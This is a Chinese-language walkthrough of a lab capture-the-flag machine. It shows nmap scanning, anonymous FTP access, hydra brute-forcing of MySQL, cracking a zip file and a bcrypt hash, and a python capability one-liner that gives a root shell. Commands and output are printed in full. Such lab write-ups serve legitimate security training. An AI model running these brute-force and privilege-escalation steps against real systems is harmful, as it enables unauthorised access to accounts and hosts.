kali:192.168.56.104
靶机:192.168.56.132
端口扫描
# nmap 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-24 15:28 CST
Nmap scan report for 192.168.56.132
Host is up (0.00066s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
开了20 21 22 80 3306端口
21端口匿名登陆,把passive模式关了
# ftp 192.168.56.132
Connected to 192.168.56.132.
220 (vsFTPd 3.0.5)
Name (192.168.56.132:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43514|)
^C
receive aborted. Waiting for remote to finish abort.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 12 Nov 22 21:46 allowedusersmysql.txt
226 Directory send OK.
ftp> get allowedusersmysql.txt
local: allowedusersmysql.txt remote: allowedusersmysql.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for allowedusersmysql.txt (12 bytes).
100% |************************************************************************************************| 12 2.03 KiB/s 00:00 ETA
226 Transfer complete.
12 bytes received in 00:00 (1.70 KiB/s)
ftp> exit
221 Goodbye.有个txt文件,是sql用户名
# cat allowedusersmysql.txt
trainerjeff用hydra爆破登录
# hydra -l trainerjeff -P /usr/share/eaphammer/wordlists/rockyou.txt mysql://192.168.56.132
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-24 15:33:03
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.132:3306/
[3306][mysql] host: 192.168.56.132 login: trainerjeff password: soccer1
爆破出来账号密码是trainerjeff/soccer1
连进去看看
# mysql -u trainerjeff -h 192.168.56.132 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 1070
Server version: 8.0.35-0ubuntu0.22.04.1 (Ubuntu)Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| trainers_db |
+--------------------+
5 rows in set (0.013 sec)MySQL [(none)]> use trainers_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
MySQL [trainers_db]> show tables;
+-----------------------+
| Tables_in_trainers_db |
+-----------------------+
| users |
+-----------------------+
1 row in set (0.004 sec)MySQL [trainers_db]> select * from users;
+----+-----------------+-------------------------------+
| id | user | password |
+----+-----------------+-------------------------------+
| 1 | gonzalo | tH1sS2stH3g0nz4l0pAsSWW0rDD!! |
| 2 | $SECRETLOGINURL | /secretLOGIN/login.html |
+----+-----------------+-------------------------------+
有用户gonzalo的账号密码并且给了登录界面 /secretLOGIN/login.html
gonzalo/tH1sS2stH3g0nz4l0pAsSWW0rDD!!
进去有压缩包文件
爆破一下
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u credentials.zip PASSWORD FOUND!!!!: pw == spongebob1
一下就爆出来了密码是spongebob1
# unzip credentials.zip
Archive: credentials.zip
[credentials.zip] passwords.txt password: inflating: passwords.txt ┌──(root㉿kali2)-[~/Desktop]
└─# cat passwords.txt
----------
$USERS: trainerjean$PASSWORD: $2y$10$DBFBehmbO6ktnyGyAtQZNeV/kiNAE.Y3He8cJsvpRxIFEhRAUe1kq 用john爆破一下这个hash
# john abc.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
tweety1 (?)
1g 0:00:04:31 DONE 2/3 (2024-03-24 15:50) 0.003681g/s 39.19p/s 39.19c/s 39.19C/s trevor1..unicorn1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
爆破出来密码是tweety1
ssh连接直接拿到user flag,还有一个python历史指令
trainerjean@slowman:~$ cat .python_history
import os
os.system('bash')
os.system('0')
os.setid('0')
os.setuid('0')
exit
提权应该与python有关
/home下还有两个用户 不过都没权限进去
trainerjean@slowman:~$ ls /home
gonzalo trainerjean trainerjeff想 提权root,尝试了sudo -l,无果,尝试看进程定时任务 无果
linpeas跑一下发现python有capabilities
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000Parent Shell capabilities:
0x0000000000000000=Files with capabilities (limited to 50):
/snap/core20/2015/usr/bin/ping cap_net_raw=ep
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
那就python的capabilities提权了
trainerjean@slowman:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1002(trainerjean) groups=1002(trainerjean)
